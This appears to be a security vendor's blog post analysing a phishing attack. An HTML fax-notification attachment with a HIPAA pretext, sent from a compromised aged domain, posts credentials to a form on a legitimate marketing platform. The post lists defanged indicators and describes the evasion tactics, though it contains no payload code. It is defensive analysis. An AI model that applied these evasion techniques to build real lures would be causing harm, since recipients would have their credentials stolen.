TL;DR A compromised domain for an aged US plumbing company sent a single-word email ('FYI') with an HTML attachment whose filename mimicked a fax work-order number. Inside, a fax-service notification with a HIPAA urgency hook presented login, reply, and download buttons that posted to a credential-harvest form on Brevo's sibforms[.]com. SPF passed through the domain's webmail host. DKIM was absent. No body links meant no URL detonation surface. The attachment scanner returned clean. Detection relied on sender-risk signals and behavioral context.
Severity: High Credential Harvesting Html Attachment Phishing MITRE: T1566.001 MITRE: T1598.003 MITRE: T1036
The message body was one word. "FYI."
There were no links inside it, no calls to action, no urgency copy. The subject line referenced a work order and a credit confirmation. The From address was a local-part that looked like a fax service sending from a domain that had been registered since 1998. SPF passed. DKIM was absent. The attachment scanner returned clean.
The payload was a 12-kilobyte HTML file named to look like a fax work-order number.
This case is about what happens when the attacker moves every malicious element off the email body and into a file the scanner cannot fully examine. No link to detonate. No URL to score. No macro. The entire threat lives inside an attachment that looks like a fax notification.
The compromised domain as a reputation laundry
The sending domain had been registered since 1998, nearly three decades old at the time of the attack. Age, by itself, is a credibility signal that both humans and filters weigh. An attacker who gains access to an old domain's outbound mail host inherits that reputation without having to build it.
The outbound path in this case ran through the domain's own webmail provider, a pair.com hosting stack. That IP was listed in the domain's SPF record, so the authentication check passed cleanly. DKIM was absent, which removes the cryptographic guarantee that the message content was not tampered with in transit. DMARC returned a best-guess pass rather than a definitive alignment result, a weaker signal than full DMARC enforcement would provide.
The Microsoft Exchange Online anti-spam stack assigned SCL=5 and routed the message to junk. That friction matters, but it is not a block. A recipient with permissive folder rules, or one looking for a misfiled message, can still open it.
A fax notification designed for a healthcare audience
The attachment was named FAX#93382529.html. The number mirrors the work-order reference in the subject line, giving the file a surface continuity with the email that makes it look like supporting documentation rather than a payload.
Inside, the lure presented as a fax-service notification. The pretext carried a HIPAA framing, which is a deliberate pressure mechanism. In healthcare-adjacent organizations, HIPAA urgency shortens the review window. The recipient is primed to act quickly on anything described as a compliance-sensitive communication. The buttons inside the attachment, labeled for login, reply, and download, each posted to a credential-harvest form hosted on Brevo's sibforms[.]com.
That hosting choice is the second evasion layer. Brevo is a legitimate marketing platform with a clean domain reputation. A URL-reputation check on sibforms[.]com returns nothing malicious because the domain itself is not malicious. The individual form path inherits the parent domain's clean score.
This is the structural problem with credential harvesting via trusted-platform forms. The attacker provisions a form on an existing legitimate service and points their fake login pages at it. The reputation gap between their objective and what the scanner measures is the entire attack surface.
Why the HTML attachment was the only place to look
The email body contained zero links. That is intentional. Every standard email security control that operates on URL content, sandbox detonation, reputation lookup, click-time scanning, had nothing to evaluate. The only artifact carrying attacker intent was the HTML file, and the scanner's verdict on the file was clean.
The technique maps to HTML smuggling at its core: moving the active content out of the detectable body and into an attachment that opens in the browser as a functional page. An HTML form renders a convincing interface and posts credentials when submitted. No macros, no obfuscation.
This maps to three MITRE ATT&CK techniques: Phishing: Spearphishing Attachment for the delivery mechanism, Phishing for Information: Spearphishing via Service for the harvest-form hosted on a third-party platform, and Masquerading for the filename that mimics a legitimate fax work-order reference.
The detection gap is the empty body
A secure email gateway's primary detection surface is the message body: links to detonate, domains to check, content patterns to score. When that surface is empty, the detection load shifts entirely onto the attachment. Sandboxing an HTML file that renders a form and posts to a legitimate provider returns no malware verdict, because the form itself is not malware. The damage happens when the victim types their credentials and clicks submit.
What did fire were behavioral signals: first-time external sender, high sender-risk score, the absence of any prior relationship between the sending address and the affected mailboxes. Those signals do not depend on inspecting content. They depend on knowing what normal looks like for a given mailbox and recognizing that this message did not fit it.
Indicators of compromise
| Type | Indicator | Context |
|---|
| Domain | [a compromised plumbing-company domain] | Compromised sender domain, registered 1998, webmail used as outbound relay |
| Email | humblefax[@][compromised sender domain] | Attacker-controlled local-part on the compromised domain |
| Attachment | FAX#93382529.html (MD5: 658bae79bac0928fea4cc423e792d212) | HTML fax-lure, 12,892 bytes, credential-harvest form inside |
| URL | hxxps://sibforms[.]com (Brevo form endpoint) | Credential-harvest form hosted on legitimate marketing platform |
| Auth | SPF pass, DKIM none, DMARC bestguesspass | Webmail relay authorized in SPF; no cryptographic content signature |
| Behavior | Zero body links | Entire payload in attachment; no URL detonation surface in body |
What actually caught it
The attachment scanner returned clean, and the body gave URL analysis nothing to work with. Detection rested on first-time sender status, elevated sender-risk scoring, and the behavioral pattern of a single-word body paired with an HTML attachment on an aged domain that had never contacted these mailboxes before. Those signals are relationship-based, not content-based.
The FBI's IC3 2024 report documents credential theft as one of the most common enablers of downstream fraud. CISA's phishing guidance emphasizes that technical controls alone do not cover the gap when malicious content sits outside the inspectable body. The operational check is behavioral: treat HTML attachments from first-time senders with no prior correspondence as high-risk regardless of attachment scanner verdict.
See Your Risk: Calculate how many threats your SEG is missing
A secure email gateway inspects what it can reach. When the only active content is inside an HTML file that posts to a reputable third-party host, there is nothing for it to fault. IRONSCALES data shows SEGs miss an average of 67.5 phishing emails per 100 mailboxes each month. The defense is behavioral: who is this sender, have they ever reached this mailbox before, and why is the body a single word.
One word. One file. That is the entire attack surface the recipient saw.
Email Attack of the Day is a daily series from
IRONSCALES spotlighting real phishing attacks caught by Adaptive AI and our community of 35,000+ security professionals. Each post breaks down a real attack. What it looked like, why it worked, and what to do about it.
/case_study_thumb_telit.webp?width=1136&height=639&name=case_study_thumb_telit.webp)
/Leadership%20Headshots/Audian%20Paxson%20Headshot%201000x1000%20032026.webp?width=100&height=100&name=Audian%20Paxson%20Headshot%201000x1000%20032026.webp)
/Misc%20Icons/icon-red-teaming-agent-gradient-simple.svg)
/Misc%20Icons/icon-phishing-soc-agent-gradient-simple.webp?width=158&height=167&name=icon-phishing-soc-agent-gradient-simple.webp)
/Misc%20Icons/icon-phishing-simulation-agent-gradient-simple.svg)
/Misc%20Icons/icon-nav-encryption.svg)
